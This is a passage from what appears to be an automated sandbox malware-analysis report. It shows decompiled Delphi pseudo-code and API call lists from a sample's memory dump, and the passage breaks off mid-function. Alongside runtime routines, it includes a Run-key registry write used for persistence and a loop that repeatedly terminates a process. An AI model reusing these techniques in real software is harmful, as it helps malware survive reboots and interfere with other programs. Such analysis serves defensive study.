    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}
































    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}













    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}











    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}
























    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}
















    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}












    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep("h N");
    				goto L2;
    			}











    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep("h N");
    				}
    			}










    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}






    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
    										L17:
    										E00408974(__ebp) = E004089A0(__ebp);
    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										if(__eflags < 0) {
    											__eax =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x10) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
    												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
    											} else {
    												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
    												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											}
    										}
    										goto L109;
    									case 5:
    										L23:
    										E00408974(__ebp) =  *(__ebp - 0xc);
    										__eax =  *(__ebp - 0xc) - 1;
    										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
    										__eflags = __eax;
    										if(__eflags < 0) {
    											E004089A0(__ebp) =  *(__ebp + 8);
    											__eax =  *(__ebp - 0x12) & 0x0000ffff;
    											__edx =  *(__ebp - 0xc);
    											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										} else {
    											if(__eflags == 0) {
    												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
    												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    											} else {
    												__eax = __eax - 1;
    												__eflags = __eax;
    												if(__eflags == 0) {
    													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
    													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
    													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
    												} else {
    													__eax = __eax - 1;
    													__eflags = __eax;
    													if(__eax == 0) {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454684; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													} else {
    														__eax =  *(__ebp + 8);
    														__eax =  *0x454688; // 0x0
    														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
    													}
    												}
    											}
    										}
    										goto L109;
    									case 6:
    										L33:
    										__eax = E00408974(__ebp);
    										__eax = E004089D8(__ebp);
    										 *(__ebp - 0x1f) = 0;
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L52:
    											__al =  *__esi;
    											__eflags =  *__esi;
    											if( *__esi == 0) {
    												break;
    											}
    											L34:
    											__eax = __eax & 0x000000ff;
    											__eflags = __eax;
    											asm("bt [0x419108], eax");
    											if(__eax >= 0) {
    												L36:
    												__eax = 0;
    												__al =  *__esi;
    												__eflags = 0 - 0x48;
    												if(0 > 0x48) {
    													L42:
    													__eax = 0xffffffffffffff9f;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														L45:
    														__eflags =  *(__ebp - 0x1f);
    														if( *(__ebp - 0x1f) != 0) {
    															L51:
    															__esi = __esi + 1;
    															__eflags = __esi;
    															continue;
    														}
    														L46:
    														__edx = 0x409418;
    														__ecx = 5;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 5, 0x409418);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L49:
    															 *((char*)(__ebp - 0x1e)) = 1;
    															break;
    														}
    														L47:
    														__edx = 0x409420;
    														__ecx = 3;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 3, 0x409420);
    														__eflags = __eax;
    														if(__eax == 0) {
    															goto L49;
    														}
    														L48:
    														__edx = 0x409424;
    														__ecx = 4;
    														__eax = __esi;
    														__eax = E004077C0(__esi, 4, 0x409424);
    														__eflags = __eax;
    														if(__eax != 0) {
    															break;
    														}
    														goto L49;
    													}
    													L43:
    													__eax = 0xffffffffffffff98;
    													__eflags = 0xffffffffffffff9f;
    													if(0xffffffffffffff9f == 0) {
    														break;
    													}
    													L44:
    													goto L51;
    												}
    												L37:
    												if(0 == 0x48) {
    													break;
    												}
    												L38:
    												__eax = 0xffffffffffffffde;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													L50:
    													__al =  *(__ebp - 0x1f);
    													__al =  *(__ebp - 0x1f) ^ 0x00000001;
    													__eflags = __al;
    													 *(__ebp - 0x1f) = __al;
    													goto L51;
    												}
    												L39:
    												__eax = 0xffffffffffffffd9;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L50;
    												}
    												L40:
    												__eax = 0xffffffffffffffbf;
    												__eflags = 0xffffffffffffffde;
    												if(0xffffffffffffffde == 0) {
    													goto L45;
    												}
    												L41:
    												goto L51;
    											} else {
    												__eax = __esi;
    												__eax = E0040B044(__esi);
    												__esi = __eax;
    												continue;
    											}
    										}
    										L53:
    										__ax =  *((intOrPtr*)(__ebp - 0x16));
    										__eflags =  *((char*)(__ebp - 0x1e));
    										if( *((char*)(__ebp - 0x1e)) != 0) {
    											__eflags = __ax;
    											if(__ax != 0) {
    												__eflags = __ax - 0xc;
    												if(__ax > 0xc) {
    													__ax = __ax - 0xc;
    													__eflags = __ax;
    												}
    											} else {
    												__ax = 0xc;
    											}
    										}
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__edx =  *(__ebp + 8);
    										__eax = __ax & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 7:
    										L61:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x18) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 8:
    										L64:
    										E00408974(__ebp) = E004089D8(__ebp);
    										__eflags =  *(__ebp - 0xc) - 2;
    										if( *(__ebp - 0xc) > 2) {
    											 *(__ebp - 0xc) = 2;
    										}
    										__eax =  *(__ebp + 8);
    										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
    										__edx =  *(__ebp - 0xc);
    										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
    										goto L109;
    									case 9:
    										L67:
